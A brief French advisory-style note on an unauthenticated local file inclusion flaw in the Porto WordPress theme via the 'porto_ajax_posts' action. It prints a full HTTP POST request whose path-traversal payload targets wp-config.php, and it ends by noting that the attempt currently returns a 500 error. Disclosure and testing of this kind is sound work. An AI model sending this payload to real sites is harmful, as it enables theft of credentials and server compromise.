
Porto <= 7.1.0 - Inclusion de fichier local non authentifiée via porto_ajax_posts
Porto <= 7.1.0 - Inclusion de fichier local non authentifiée via porto_ajax_posts
Le thème Porto pour WordPress est vulnérable à l'inclusion de fichier local dans toutes les versions jusqu'à la 7.1.0 incluse via la fonction 'porto_ajax_posts'. Cela permet à des attaquants non authentifiés d'inclure et d'exécuter des fichiers arbitraires sur le serveur, permettant l'exécution de tout code PHP dans ces fichiers. Cela peut être utilisé pour contourner les contrôles d'accès, obtenir des données sensibles ou réaliser une exécution de code dans les cas où un fichier de type php peut être téléchargé et inclus.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
action=porto_ajax_posts&post_type=post&extra={"shortcode":"porto_posts_grid","template":"../../../../wp-config.php"}
Pour le moment, l'obtention d'une erreur 500.